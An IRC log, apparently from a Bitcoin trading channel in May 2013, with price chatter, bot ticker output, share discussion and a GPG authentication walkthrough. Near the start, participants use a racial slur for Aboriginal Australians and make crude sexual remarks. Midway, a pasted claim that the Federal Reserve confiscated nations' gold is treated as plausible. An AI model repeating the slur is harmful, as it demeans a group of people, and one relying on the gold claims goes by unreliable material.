haha an abo, christ May 01 17:18:42 what;s an abo ? May 01 17:19:22 oh mircea May 01 17:19:34 pic time May 01 17:19:37 abo = indigenous aus May 01 17:19:48 o o May 01 17:20:30 been with a few half abs before scrat, not bad May 01 17:20:43 apparently SR is being extorted? May 01 17:20:47 ;;title http://au.businessinsider.com/silkroad-attack-hyperdeflation-2013-5 May 01 17:20:48 REPORT: Infamous Bitcoin Marketplace SilkRoad Is On The Verge Of Collapse Abd Suffering Massive Hyperdeflation | Business Insider Australia May 01 17:20:57 lolright. May 01 17:21:16 the australian media reports have been lulz May 01 17:21:21 Abd May 01 17:23:26 ^? what is abd? May 01 17:23:33 aboriginal? May 01 17:25:40 it's "and" for hack au journalists May 01 17:27:32 apparently so. thx May 01 17:27:58 lol May 01 17:28:06 mircea_popescu: I bought a ticket to romania May 01 17:28:08 I will post pics May 01 17:28:15 WE HANG OUT YES? May 01 17:28:16 lol May 01 17:28:23 so, mid-week downwards trend? May 01 17:28:25 tits May 01 17:28:28 sup May 01 17:28:57 hang out with the cocks out May 01 17:29:03 mircea_popescu: http://trilema.com/meet-trilema/ May 01 17:30:03 haven't had those since 2010 i think May 01 17:30:11 Hahaha May 01 17:30:28 Deceiving. May 01 17:30:40 i welcome the price dip, for now May 01 17:31:36 AM is at 10,000 May 01 17:32:14 Yea but it's gonna have that whiplash from yesterday May 01 17:32:20 130 is a good buy target May 01 17:33:01 https://bitcointalk.org/index.php?topic=174620.msg1994500#msg1994500 May 01 17:33:05 ^lol mpoe-pr May 01 17:34:02 itll fo below 230 May 01 17:34:04 130* May 01 17:34:19 i'm thinking mor elike 120 May 01 17:35:36 deadweasel apparently he deleted it once. May 01 17:36:00 ;;next May 01 17:36:01 targets: 120-123 | resistance: 142, 143-145| support: 137-139, 131-133, 120-123 | updated by OneFixt at Apr 30 2013, 16:01 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 22 hours, 34 minutes, and 58 seconds ago May 01 17:36:06 ;;ticker May 01 17:36:07 BTCUSD ticker | Best bid: 128.60001, Best ask: 128.89999, Bid-ask spread: 0.29998, Last trade: 128.60001, 24 hour volume: 93594.34085401, 24 hour low: 127.19900, 24 hour high: 142.88667, 24 hour vwap: 134.39986 May 01 17:36:08 ;;ticker --vo May 01 17:36:09 93594.34085401 May 01 17:36:19 ThickAsThieves: I think you're overestimating current speculators May 01 17:36:35 mircea_popescu: I would too if my faux conference was being taken apart. May 01 17:36:45 it's wildy entertaining though. May 01 17:36:50 whoa that guy with the puts May 01 17:36:52 128, srsly ? May 01 17:37:09 how many outstanding puts went to the bot? May 01 17:37:10 deadweasel it is. May 01 17:37:11 4000 right? May 01 17:37:12 4k May 01 17:37:27 told you :) see you @ 110$ May 01 17:37:43 ;;calc (320 - 120)/120 * 4000 May 01 17:37:43 6666.66666667 May 01 17:37:56 So like 1000 BTC... May 01 17:38:04 Why are people giving the bot free money? May 01 17:38:36 for the good of bitcoin stability, like all things bot related May 01 17:38:38 ;) May 01 17:39:12 Good way to start off the month if it truly does hit 120 May 01 17:39:18 um May 01 17:39:24 afaik it was sold for like 1.25 May 01 17:39:27 now like 1.4 or so May 01 17:39:33 so like 600 maybe May 01 17:39:47 but at 120 it'll exercise for May 01 17:39:51 ;;calc (320 - 120)/120 May 01 17:39:51 1.66666666667 May 01 17:39:52 is this a vacation week in Japan? May 01 17:40:07 so .4 per put? May 01 17:40:08 that results in lack of cash into Gox from Japan? May 01 17:40:12 ;;calc 4000 * .4 May 01 17:40:12 1600 May 01 17:40:29 like .15 May 01 17:40:31 yea we're talking 1k earned @ bc,24hprc = 120 May 01 17:40:46 I thought all 4000 were sold < 1.3 May 01 17:41:06 like 1.25 iirc May 01 17:41:15 o o nm May 01 17:41:18 i see what you mean May 01 17:41:28 yea so the bot is getting free money pretty much lol May 01 17:41:38 if it hits 120 bc,24hprc May 01 17:41:51 yeah. well... obviously they guy was expecting price uptrend May 01 17:42:49 not free money May 01 17:42:56 bot paid dearly last 2 mos May 01 17:43:22 yeah, sometimes it goes one way, sometimes it goes the other wya. May 01 17:46:19 the last 2 mos were a perfect storm, I don't think it was nearly as bad as Augush 2012 May 01 17:46:28 August* May 01 17:46:59 http://www.urbandictionary.com/define.php?term=stam May 01 17:47:02 "I just witnessed Brad stam his girlfriend. It was terrifying." May 01 17:47:15 august was like 45% or somthing May 01 17:47:51 Last month was ~22% no? May 01 17:48:18 yea May 01 17:48:32 http://nsnbc.me/2013/04/18/federal-reserve-refuses-to-submit-to-an-audit-of-germanys-gold-held-in-u-s-vaults-2/ May 01 17:48:35 this stuff is wicked May 01 17:48:45 The FED came to all countries in Asia, Latin America and Africa and told them their gold holdings might not be safe because of the war, and they should permit the FED to take all of it to the US for safekeeping. Many countries obliged, receiving FED gold certificates in exchange, but when they later tried to cash in those certificates and reclaim their gold, they were told the certificates were fake, that they containe May 01 17:48:45 d spelling and other mistakes which the FED would never have made, and that the serial numbers were wrong. And the FED still has all that gold. May 01 17:48:45 They even did that to Chiang Kai-Shek, taking all of Taiwan’s gold – that had been looted from China – and never returning it. The last I heard, Chiang’s wife was still trying to recover her gold from the FED. May 01 17:48:45 Apparently a few people have been successful in presenting their certificates to the FED, with documentation that was irrefutable, but even in those cases the owners were forced to settle for only 1% or 2% of the actual value. And most other people or nations who attempt to redeem these certificates are arrested by the FBI for fraud – at the request of the FED. May 01 17:48:50 i wonder how much of that is true ?! May 01 17:50:20 War never changes May 01 17:50:25 nsnbc,me is that a real media site??? May 01 17:50:46 i read that yesterday MP, i've been following the gold scandals for about 7 years May 01 17:50:51 wtf May 01 17:50:52 the tungsten plated bars? May 01 17:51:13 http://www.zerohedge.com/news/2012-09-24/get-your-fake-tungsten-filled-gold-coins-here May 01 17:51:40 the tungsten stuff is kinda old. May 01 17:51:42 Germans have invaded countries for far less May 01 17:51:44 the FED, i believe, has been hollowing out all their 'protective custody' gold and filling with tungsten. May 01 17:52:02 thing is, nobody has been able to check any of the gold hoards, so could all be that way May 01 17:52:08 nsnbc.me ? i have never ever heard of that site? are they a real site or just trollin? May 01 17:52:13 no doubt damientrog May 01 17:52:50 yeah they visited us twice in the last century :) May 01 17:52:52 logout May 01 17:53:23 Chaang-Noi i hacve no idea May 01 17:53:33 ;;gpg eregister bpvanoort F8E8339C9B5A8C17 May 01 17:53:35 Request successful for user bpvanoort, hostmask bpvanoort!329a06b1@gateway/web/freenode/ip.50.154.6.177. Get your encrypted OTP from http://bitcoin-otc.com/otps/F8E8339C9B5A8C17 May 01 17:53:37 yeah, i kinda question the source May 01 17:57:06 gpg --decrypt May 01 17:57:28 deadweasel: why even do that? it would be much easier and controllable to just restrict access to select few people May 01 17:58:41 ;;gpg eauth bpvanoort May 01 17:58:41 Error: This nick is not registered. Please register. May 01 17:59:05 "MPOE-PR did reply with insult" May 01 17:59:09 it replied with insult!! May 01 17:59:11 ;;gpg eregister bpvanoort F8E8339C9B5A8C17 May 01 17:59:12 Request successful for user bpvanoort, hostmask bpvanoort!329a06b1@gateway/web/freenode/ip.50.154.6.177. Get your encrypted OTP from http://bitcoin-otc.com/otps/F8E8339C9B5A8C17 May 01 17:59:20 bpvanoort you need to decript the text on your own system, May 01 17:59:20 [BTCTC] [BTC-BOND] 20 @ 0.010001 = 0.2 BTC [-] May 01 17:59:29 [BTCTC] [BTC-BOND] 1500 @ 0.01 = 15 BTC [-] May 01 17:59:32 [BTCTC] [BTC-BOND] 5 @ 0.00995 = 0.0498 BTC [-] May 01 17:59:41 if you're on linux just run gpg May 01 17:59:47 if on windows probably have to install something. May 01 17:59:53 i run windows 7 May 01 17:59:57 i have installed gpg May 01 18:00:05 so then open a terminal and go gpg May 01 18:00:08 i follow http://wiki.bitcoin-otc.com/wiki/GPG_authentication May 01 18:00:08 paste the text in there May 01 18:00:13 ok May 01 18:00:16 thank you :) May 01 18:00:24 http://bitcoin-otc.com/otps/F8E8339C9B5A8C17 << copy text from there May 01 18:03:57 [BTCTC] [ASICMINER-PT] 1 @ 1.26599 BTC [+] May 01 18:04:02 [BTCTC] [ASICMINER-PT] 1 @ 1.266 BTC [+] May 01 18:04:06 [BTCTC] [ASICMINER-PT] 1 @ 1.267 BTC [+] May 01 18:04:16 [BTCTC] [ASICMINER-PT] 1 @ 1.268 BTC [+] May 01 18:04:27 [BTCTC] [ASICMINER-PT] 1 @ 1.269 BTC [+] May 01 18:04:41 [BTCTC] [ASICMINER-PT] 1 @ 1.26997 BTC [+] May 01 18:04:53 [BTCTC] [ASICMINER-PT] 2 @ 1.26998 = 2.54 BTC [+] May 01 18:04:57 [BTCTC] [ASICMINER-PT] 1 @ 1.27 BTC [+] May 01 18:05:01 [BTCTC] [ASICMINER-PT] 2 @ 1.27988 = 2.5598 BTC [+] May 01 18:05:18 still too cheap May 01 18:05:23 [BTCTC] [ASICMINER-PT] 1 @ 1.27988 BTC [+] May 01 18:05:27 [BTCTC] [ASICMINER-PT] 1 @ 1.27989 BTC [+] May 01 18:05:35 i do that, then i decrypt in pgp but i dont get the freenode: line May 01 18:05:38 [BTCTC] [ASICMINER-PT] 7 @ 1.2799 = 8.9593 BTC [+] May 01 18:05:51 [BTCTC] [ASICMINER-PT] 1 @ 1.2799 BTC [+] May 01 18:05:56 [BTCTC] [ASICMINER-PT] 3 @ 1.27991 = 3.8397 BTC [+] May 01 18:06:00 [BTCTC] [ASICMINER-PT] 1 @ 1.279911 BTC [+] May 01 18:06:17 [BTCTC] [ASICMINER-PT] 10 @ 1.279912 = 12.7991 BTC [+] May 01 18:09:11 bpvanoort: ctrl + D May 01 18:09:20 [BTCTC] [ASICMINER-PT] 1 @ 1.23018 BTC [-] May 01 18:09:24 [BTCTC] [ASICMINER-PT] 1 @ 1.23017 BTC [-] May 01 18:09:28 [BTCTC] [ASICMINER-PT] 1 @ 1.23 BTC [-] May 01 18:09:36 [BTCTC] [ASICMINER-PT] 1 @ 1.226001 BTC [-] May 01 18:09:39 [BTCTC] [ASICMINER-PT] 5 @ 1.226 = 6.13 BTC [-] May 01 18:09:43 lol sell right before dividends, lulz May 01 18:09:48 [BTCTC] [ASICMINER-PT] 4 @ 1.225 = 4.9 BTC [-] May 01 18:11:04 ;;gpg everify freenode:#bitcoin-otc:532f2b9857b627dd4b3c092e22b575afc72094b9ff08fd22ba231c06 May 01 18:11:05 Registration successful. You are now authenticated for user bpvanoort with key F8E8339C9B5A8C17 May 01 18:11:10 lol May 01 18:11:13 a new gpg user? May 01 18:11:14 :) May 01 18:11:17 :) May 01 18:11:18 Scrat, isn't that what they are doing? Nobody has audited the gold since 1947 or something.. those that have come close get 1 little piece to check out. May 01 18:11:22 ;;getrating bpvanoort May 01 18:11:22 This user has not yet been rated. Currently authenticated from hostmask bpvanoort!329a06b1@gateway/web/freenode/ip.50.154.6.177 . May 01 18:11:27 welcome aboard May 01 18:11:32 I apologize if i spammed in any way May 01 18:11:48 no worries, it's a requirement of getting OTC working. May 01 18:11:54 ok May 01 18:12:06 do i neet to everify every time i come in here? May 01 18:12:08 As a man wiser than myself once said, "We all started as a novice once". May 01 18:12:13 bpvanoort: no May 01 18:12:18 bpvanoort: only if you leave irc May 01 18:12:25 or gribble goes down May 01 18:12:47 great May 01 18:13:11 basically each time gribble loses sight of you May 01 18:13:24 but you only really need to be logged in if you rate somebody or if you're writing a contract May 01 18:13:29 so it's not too bad. May 01 18:14:01 for instance May 01 18:14:04 ;;ident mircea_popescu May 01 18:14:05 Nick 'mircea_popescu', with hostmask 'mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu', is not identified. May 01 18:14:11 but we still believe it's him May 01 18:14:20 haha okay May 01 18:14:20 Or are you reall kakobrekla in disguise? May 01 18:14:49 all i need to identify on other machines is the passphrase righ? May 01 18:14:52 right? May 01 18:14:58 you need key May 01 18:15:01 private key May 01 18:15:04 you need the key, on gpg. May 01 18:15:27 the 16 character one? May 01 18:15:41 no, the private key. May 01 18:15:55 http://trilema.com/pgp/ May 01 18:16:02 the long gibberish thing there is my public key May 01 18:16:08 the private key is similar but longer, and secret. May 01 18:16:18 you have to keep it safe, take good care of it. May 01 18:16:26 this one i didnt get yet May 01 18:16:55 this is serious business, losing your keys can cause damage May 01 18:17:07 as anyone can sign for you. think of it exactly as your irl signature May 01 18:17:15 alright May 01 18:17:18 [MPEX] [S.MPOE] 6890 @ 0.00072889 = 5.0221 BTC [-] May 01 18:17:19 except if someone signs with yours NOBODY will believe it wasn't you May 01 18:17:20 should it be in my pgp folder? May 01 18:17:32 gpg encrypts it in its keyring. May 01 18:17:37 to extract it there's a special command. May 01 18:17:42 but be safe with it. May 01 18:18:10 (for those who manually auth each time - there are scripts to automate gribble auth fyi!) May 01 18:18:36 thanks for the advice. I can't have Satoshi Poker being compromised because of being a newb in gpg May 01 18:18:41 yes. May 01 18:18:47 best advice is let the key be, May 01 18:19:05 copy the keyring file somewhere in a truecrypt volume May 01 18:19:09 for backup May 01 18:19:47 (indeed - i keep my truecrypt volume file in dropbox and consider it a sane and safe choice. i keep ultraimportant backups on that truecrypt volume.) May 01 18:20:57 alright, i will do that as I switch notebooks all the time May 01 18:21:29 it's not a disaster if you have only one notebook than can sign May 01 18:21:32 and keep it locked up May 01 18:21:45 you will never need this like INSTA and unexpectedly anwyay May 01 18:22:00 doubts/questions on truecrypt been resolved now ? May 01 18:22:49 yes May 01 18:22:57 [BTCTC] [COGNITIVE] 1 @ 0.222 BTC [-] May 01 18:23:02 thanks a lot for all the help May 01 18:23:05 Troic_, which ones? i'm probably in the dark, would be interested to hear (links?) May 01 18:23:11 [BTCTC] [COGNITIVE] 4 @ 0.221 = 0.884 BTC [-] May 01 18:24:46 I seem to remember there where a whole bunch of issues regarding its closed source nature (at the time ? ) May 01 18:24:59 oh, must have been a long time ago May 01 18:25:42 k, thanks. yeah, as i take it, it's currently well-regarded in underground / security circles (afaik) May 01 18:25:56 [BTCTC] [BASIC-MINING] 1 @ 0.4211 BTC [+] May 01 18:26:05 [BTCTC] [BASIC-MINING] 5 @ 0.42101 = 2.1051 BTC [-] May 01 18:33:29 [BTCTC] [COGNITIVE] 10 @ 0.22 = 2.2 BTC [-] May 01 18:35:19 [BTCTC] [BASIC-MINING] 1 @ 0.42101 BTC [-] May 01 18:36:25 afaik its open source now May 01 18:37:03 [BTCTC] [COGNITIVE] 1 @ 0.20101 BTC [-] May 01 18:37:28 [BTCTC] [COGNITIVE] 1 @ 0.201 BTC [-] May 01 18:40:21 ;;asks 999999999999 May 01 18:40:21 There are currently 165283.72 bitcoins offered at or under 999999999999.0 USD, worth 1.43638396996e+12 USD in total. | Data vintage: 101.3467 seconds May 01 18:40:56 ;;goxlag May 01 18:40:57 MtGox lag is 0.251057 seconds. During this time, light travels 0.000503115417026 AU. You could have sent a bitcoin to the other side of the Earth, along the surface (0.0001339 AU). May 01 18:41:00 ;;bids 0 May 01 18:41:03 There are currently 26807424 bitcoins demanded at or over 0.0 USD, worth 18109311.7963 USD in total. | Data vintage: 0.0120 seconds May 01 18:41:04 why is the vintage 101 and the lag .2 ? May 01 18:41:11 nanotube any idea ? May 01 18:42:01 mircea_popescu: vintage means "how long ago was the order book data retrieved" May 01 18:42:03 http://www.reddit.com/r/Games/comments/1dglil/popular_competitive_gaming_league_esea_admins/ May 01 18:42:08 gribble caches the book data for 120 seconds May 01 18:42:13 to avoid flooding mtgox May 01 18:42:43 a cache aha May 01 18:42:43 ty May 01 18:42:47 np :) May 01 18:43:11 whoa jcpham May 01 18:43:20 just a little bit, right May 01 18:43:33 and that's a small gaming company May 01 18:44:12 well CS isn't small May 01 18:46:22 [BTCTC] [MININGCO.ETF] 6 @ 0.689 = 4.134 BTC [+] May 01 18:53:41 [BTCTC] [BASIC-MINING] 1 @ 0.4275 BTC [+] May 01 18:53:43 [BTCTC] [ASICMINER-PT] 1 @ 1.264979 BTC [+] May 01 19:03:24 [BTCTC] [ASICMINER-PT] 1 @ 1.26497 BTC [-] May 01 19:03:39 [BTCTC] [ASICMINER-PT] 1 @ 1.264979 BTC [+] May 01 19:04:50 [BTCTC] [ASICMINER-PT] 1 @ 1.26899 BTC [+] May 01 19:05:57 [MPEX] [S.MPOE] 15950 @ 0.00072787 = 11.6095 BTC [-] May 01 19:05:59 [MPEX] [S.MPOE] 11000 @ 0.00071204 = 7.8324 BTC [-] May 01 19:15:30 ;;ticker May 01 19:15:30 BTCUSD ticker | Best bid: 128.30001, Best ask: 128.99999, Bid-ask spread: 0.69998, Last trade: 128.30001, 24 hour volume: 88882.60688582, 24 hour low: 127.19900, 24 hour high: 141.90000, 24 hour vwap: 133.53842 May 01 19:15:47 any assets on sale? stocks ? May 01 19:15:53 [BTCTC] [ASICMINER-PT] 2 @ 1.265 = 2.53 BTC [-] May 01 19:16:12 plenty. May 01 19:16:23 which ones ? May 01 19:16:42 list plz. May 01 19:16:46 lol May 01 19:16:49 !t m s.mpoe May 01 19:16:50 [MPEX:S.MPOE] 1D: 0.00069156 / 0.00071695 / 0.00073864 (432507 shares, 310.09 BTC), 7D: 0.00064 / 0.00070566 / 0.00076528 (2580745 shares, 1,821.14 BTC), 30D: 0.00059218 / 0.00069776 / 0.00076528 (10143106 shares, 7,077.47 BTC) May 01 19:16:51 !t m s.dice May 01 19:16:51 I'll sell 5mn shares of Ziggap for 1 btc each May 01 19:16:52 [MPEX:S.DICE] 1D: 0.00291 / 0.00291068 / 0.00302256 (7395 shares, 21.52 BTC), 7D: 0.00278789 / 0.00304025 / 0.00349938 (39765 shares, 120.90 BTC), 30D: 0.0012 / 0.00308812 / 0.00439999 (886602 shares, 2,737.94 BTC) May 01 19:16:53 !t m s.bbet May 01 19:16:54 [MPEX:S.BBET] 1D: 0.00100005 / 0.00105714 / 0.00199994 (16200 shares, 17.13 BTC), 7D: 0.00099999 / 0.0014621 / 0.00199994 (135310 shares, 197.84 BTC), 30D: 0.0007531 / 0.00160815 / 0.00201394 (262680 shares, 422.43 BTC) May 01 19:17:02 !t b asicminer-pt May 01 19:17:03 It's so strange that you don't remember any of your poetry. May 01 19:17:06 hum May 01 19:17:19 !t btctc asicminer-pt May 01 19:17:19 there's maybe 500 other pinksheets stuff. May 01 19:17:21 [BTCT:ASICMINER-PT] 1D: 1.20602 / 1.25733 / 1.30999 (270 shares, 339.5 BTC), 7D: 1.0711 / 1.24101 / 1.34698 (1682 shares, 2087.4 BTC), 30D: 0.6269 / 0.98436 / 1.75 (7143 shares, 7031.3 BTC) May 01 19:19:00 s.bbet = ?? May 01 19:19:50 hmm BBET = Bitcoin casino. May 01 19:19:52 http://bitbet.us/ May 01 19:21:03 [HAVELOCK] [SDICE] 40 @ 0.31000001 = 12.4 BTC [-] May 01 19:21:05 [HAVELOCK] [SDICE] 33 @ 0.31 = 10.23 BTC [-] May 01 19:21:36 bitbet is lame May 01 19:21:43 they scam their customers May 01 19:22:07 by reversing the outcome of bets May 01 19:22:09 lol jk May 01 19:23:12 [MPEX] [S.DICE] 4050 @ 0.00296589 = 12.0119 BTC [+] May 01 19:24:03 [HAVELOCK] [SDICE] 41 @ 0.31 = 12.71 BTC [-] May 01 19:26:13 http://www.realclearscience.com/blog/2013/04/antibiotic-protects-men-from-attractive-women.html May 01 19:26:15 ahem. May 01 19:26:24 [MPEX] [S.DICE] 50 @ 0.00296589 = 0.1483 BTC [+] May 01 19:26:25 [MPEX] [S.DICE] 4050 @ 0.00302256 = 12.2414 BTC [+] May 01 19:27:00 [MPEX] [S.DICE] 655 @ 0.00302256 = 1.9798 BTC [+] May 01 19:27:02 [MPEX] [S.DICE] 345 @ 0.00311776 = 1.0756 BTC [+] May 01 19:27:38 ;;ticker May 01 19:27:39 BTCUSD ticker | Best bid: 125.67379, Best ask: 125.69999, Bid-ask spread: 0.02620, Last trade: 125.70000, 24 hour volume: 91477.79763376, 24 hour low: 125.89000, 24 hour high: 141.90000, 24 hour vwap: 133.27199 May 01 19:28:04 [HAVELOCK] [SDICE] 51 @ 0.31 = 15.81 BTC [-] May 01 19:28:22 [BTCTC] [ASICMINER-PT] 1 @ 1.265 BTC [-] May 01 19:28:36 big dump May 01 19:28:40 ;;ticker May 01 19:28:41 BTCUSD ticker | Best bid: 124.87616, Best ask: 124.88000, Bid-ask spread: 0.00384, Last trade: 124.90000, 24 hour volume: 92760.18820961, 24 hour low: 125.10000, 24 hour high: 141.90000, 24 hour vwap: 133.16109 May 01 19:29:08 ;;goxlag May 01 19:29:09 MtGox lag is 29.035313 seconds. During this time, light travels 0.0581864421564 AU. You could have sent a bitcoin approximately the distance covered by Voyager 1 in one week (0.0689 AU). May 01 19:29:22 oh wow plummeting May 01 19:29:56 quality May 01 19:30:47 If it breaks through to 120 it's gonna cause whiplash May 01 19:30:49 ;;next May 01 19:30:49 targets: 120-123 to go 50/50 cash/btc and re-evaluate situation | updated by OneFixt at May 1 2013, 15:52 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 38 minutes and 46 seconds ago May 01 19:31:30 http://blockchained.com/depth_mtgox_15d.png May 01 19:31:51 [MPEX] [S.MPOE] 15150 @ 0.00069572 = 10.5402 BTC [-] May 01 19:33:09 ;;bc,24hprc May 01 19:33:10 132.93 May 01 19:33:37 ;;calc (134 - 120) / 120 May 01 19:33:37 0.116666666667 May 01 19:38:43 http://www.pophams.com/blog/bitcoinmining-conclusions May 01 19:38:59 that's a funny blog post from october 2011 May 01 19:39:47 davout so how's reading code coming along ? May 01 19:39:55 found any new gerbils yet ? May 01 19:40:17 mircea_popescu: wut May 01 19:40:43 you're supposed to be working on bitcoin-central, what May 01 19:40:47 you thought it's vacation time ? May 01 19:40:57 jcpham http://www.pophams.com/_/rsrc/1261591123886/072906025Large-custom-size-170-128.jpg is that miss popham ? May 01 19:41:15 sexual predator May 01 19:41:18 yes :) May 01 19:41:42 there's like 20k USD in that screenshot May 01 19:43:01 haha cool May 01 19:43:56 btw, you win https://bitcointalk.org/index.php?topic=192206.msg1991060#msg1991060 May 01 19:43:59 go draw your dongs nao May 01 19:48:19 O_o May 01 19:49:37 i go in that shithole to auth only May 01 19:49:50 cause the script does it for me May 01 19:49:57 and im too lazy to change it to some other chan May 01 19:50:05 mircea_popescu that bus thingy... i like May 01 19:50:27 truffles not my fault May 01 19:50:31 any quality shares, that looks like a real thing ? May 01 19:50:54 nope May 01 19:51:00 not even mpoe is real May 01 19:51:08 MPOE as tiberiusiv says is a scam too May 01 19:51:18 so leave your money with the FED May 01 19:51:21 (only one seems real is ASICminer, but IMO too expensive) May 01 19:51:34 kakobrekla you know you can auth here now May 01 19:52:34 ya May 01 19:52:40 the script doesnt though May 01 19:53:05 (only one seems real is ASICminer, but IMO too expensive) <--- I am opening a fractional version of ASICMINER shares, pm for link May 01 19:53:33 "fractional version" ? May 01 19:53:44 i.e. divided into smaller units ? May 01 19:53:44 shares will be split 1/100 May 01 19:53:56 This won't make them any cheaper ^^ Only smaller... May 01 19:54:00 maybe so May 01 19:54:14 The problem is market cap of $65 mil, which I'm not ready to pay May 01 19:54:30 and by dividing further it will not suddenly make them any cheaper May 01 19:54:38 you probly aren't ready to pay for any crypto stock worth buying then May 01 19:54:44 well i don't imagine anyone outside of mpex has any shorting capabilities still, May 01 19:54:50 as i was trying to short them last month with no success. May 01 19:54:53 so i guess you're stuck. May 01 19:54:59 I'm evaluating options. May 01 19:55:10 I may reject 100 companies before I accept 1. May 01 19:55:23 good strategy. May 01 19:55:37 it'll end up boiling down to 4 May 01 19:55:38 a better idea would be to start a blog and publish your analysus there May 01 19:55:45 MPOE, AM, SDICE, BBET May 01 19:55:48 this way community benefits from your work and you benefit from any comments etc May 01 19:56:41 AM has highest divs, MPOE has deepest liquidity, SDICE is in between, BBET is possible longer term bet May 01 19:56:51 ASICminer rejected on market cap basis. (but not on quality) May 01 19:57:17 all of them will likely fail that metric with you May 01 19:57:32 there are also some decent bonds May 01 19:57:56 one is run by Namworld, the other Deprived May 01 19:59:17 ya trhis is a point. May 01 20:00:59 ;;voiceme May 01 20:00:59 Error: You already have voice in #bitcoin-otc. May 01 20:01:56 no, why? May 01 20:01:59 did i miss someone? May 01 20:02:33 no they both run their bonds like champs May 01 20:03:14 Deprived's has better payout May 01 20:03:22 but is in LTC May 01 20:03:30 but stil denominated in BTC May 01 20:03:49 Nam's pays daily May 01 20:04:03 so compunded interest is easier if reinvesting May 01 20:04:11 compounded* May 01 20:04:33 well not easier, but more compounded May 01 20:04:35 :) May 01 20:05:27 [BTCTC] [ASICMINER-PT] 1 @ 1.26 BTC [-] May 01 20:05:39 [BTCTC] [ASICMINER-PT] 1 @ 1.23 BTC [-] May 01 20:05:47 [BTCTC] [ASICMINER-PT] 1 @ 1.21803 BTC [-] May 01 20:05:50 [BTCTC] [ASICMINER-PT] 7 @ 1.21802 = 8.5261 BTC [-] May 01 20:05:59 [BTCTC] [ASICMINER-PT] 2 @ 1.21802 = 2.436 BTC [-] May 01 20:06:09 [BTCTC] [ASICMINER-PT] 3 @ 1.218 = 3.654 BTC [-] May 01 20:06:54 MPOE = MPEX ? May 01 20:07:27 [BTCTC] [GSDPT] 91 @ 0.0031 = 0.2821 BTC [-] May 01 20:07:46 Technologov: MPOE = mircea's popsicle empire May 01 20:07:47 [BTCTC] [S.DICE-PT] 100 @ 0.003021 = 0.3021 BTC [-] May 01 20:08:02 [BTCTC] [S.DICE-PT] 66 @ 0.003021 = 0.1994 BTC [-] May 01 20:08:07 [BTCTC] [S.DICE-PT] 100 @ 0.003011 = 0.3011 BTC [-] May 01 20:08:17 [BTCTC] [S.DICE-PT] 5 @ 0.003001 = 0.015 BTC [-] May 01 20:08:22 [BTCTC] [S.DICE-PT] 100 @ 0.003 = 0.3 BTC [-] May 01 20:08:37 ono, the jig ? May 01 20:08:59 Are there any mining shares, like ASIC miner? (but cheaper?) May 01 20:09:01 is ^ May 01 20:09:24 there are many mining operations May 01 20:09:31 all are much more risky than AM May 01 20:09:40 usually losing propositions May 01 20:09:50 because mining diff is going up up up May 01 20:10:01 and liquidity goes down down down May 01 20:10:07 the notion of investing by cheapness is usually self defeating. May 01 20:10:39 The notion of ASICminer share prices makes no sense whatsoever. May 01 20:10:44 $65,000,000 (dollars worth) / 8076. (GH/s) = $8048 per GH/s. May 01 20:10:57 This is their price. A bit extreme, don't you think ? May 01 20:10:59 they are at about 10,5000 May 01 20:11:02 i mean, don't like netflix cause it's too expensive ? try gtrl. http://trilema.com/2012/gtrl-or-gtfo/ May 01 20:11:03 10,500* May 01 20:11:11 and will be at 15k in a few days May 01 20:11:31 Technologov as i said i have been looking to short them months ago. May 01 20:11:33 is an ipad worth $600? May 01 20:11:36 yet people buy May 01 20:11:43 the theory is that they have more product in the pipeline etc. May 01 20:11:55 their auction to sell blades yielded what, 1.5k for 50 chips May 01 20:12:12 ;;calc 1500 * 130 / 50 / 10 May 01 20:12:12 390 May 01 20:12:20 $390 per gh May 01 20:12:27 mircea_popescu, but only if you have Bitcoin as hedge (not with dollar LOL) May 01 20:12:30 [BTCTC] [ASICMINER-PT] 1 @ 1.24999 BTC [+] May 01 20:12:34 [BTCTC] [ASICMINER-PT] 1 @ 1.24999 BTC [+] May 01 20:12:40 [BTCTC] [ASICMINER-PT] 2 @ 1.25 = 2.5 BTC [+] May 01 20:13:02 techno, you also have to factor liquidity May 01 20:13:06 its a big factor May 01 20:13:16 something can make sense today May 01 20:13:16 kakobrekla https://bitcointalk.org/index.php?topic=192122.msg1995961#msg1995961 May 01 20:13:20 wonder if that goes to 500 pages. May 01 20:13:24 fall in price and lock you in tomorrow May 01 20:13:37 hardly cause the bitch keeps deleting my trollings May 01 20:13:56 think i.e. you can't buy or sell ? May 01 20:14:02 like that fuckin conversion table wasnt good enough? May 01 20:14:08 or just big spread? May 01 20:14:16 shallow bid orderbook May 01 20:14:17 i spet like serious amounts of seconds on that May 01 20:14:35 oh May 01 20:14:36 shit May 01 20:14:41 wrong thread May 01 20:14:49 lol which were you thinking May 01 20:14:49 i thought you linked reptil dude May 01 20:14:52 o May 01 20:15:02 my bad May 01 20:15:06 shot first ask later. May 01 20:15:11 conversion table got deleted ?! May 01 20:15:15 yes May 01 20:15:18 asshat. May 01 20:15:20 :( May 01 20:15:26 was pretty good i thought. May 01 20:15:52 well twas useful for me May 01 20:18:04 [HAVELOCK] [VTX] 4 @ 0.47939789 = 1.9176 BTC [+] May 01 20:18:05 [HAVELOCK] [VTX] 1 @ 0.479 BTC [-] May 01 20:20:01 https://bitcointalk.org/index.php?topic=192434.msg1993540#msg1993540 May 01 20:20:04 lol May 01 20:26:55 that dude deleted both of my posts from his diary May 01 20:27:06 sector 8 sublevel 9 meganodes not alowed May 01 20:30:04 aww May 01 20:30:44 yes yes May 01 20:30:50 we were all de-leeted May 01 20:30:58 https://bitcointalk.org/index.php?topic=192434.msg1996135#msg1996135 gotta love de butthurt May 01 20:31:17 kakobrekla if you feel like more epic trolling, start a thread, post your stuff, mpoe-pr etc. May 01 20:31:24 thread battle. May 01 20:31:38 on the other hand, shouldn't you be busy doing stuff! May 01 20:32:16 myea, this forum is un-doing May 01 20:46:56 ;;ticker May 01 20:46:56 BTCUSD ticker | Best bid: 122.50000, Best ask: 122.51000, Bid-ask spread: 0.01000, Last trade: 122.51000, 24 hour volume: 100036.15054850, 24 hour low: 122.28200, 24 hour high: 141.90000, 24 hour vwap: 131.69547 May 01 20:47:09 Oh wow May 01 20:47:16 ;;bids 120 May 01 20:47:18 There are currently 9594.3663 bitcoins demanded at or over 120.0 USD, worth 1159798.60505 USD in total. | Data vintage: 0.0068 seconds May 01 20:47:59 looking pretty nasty. http://blockchained.com/depth_mtgox_15d.png May 01 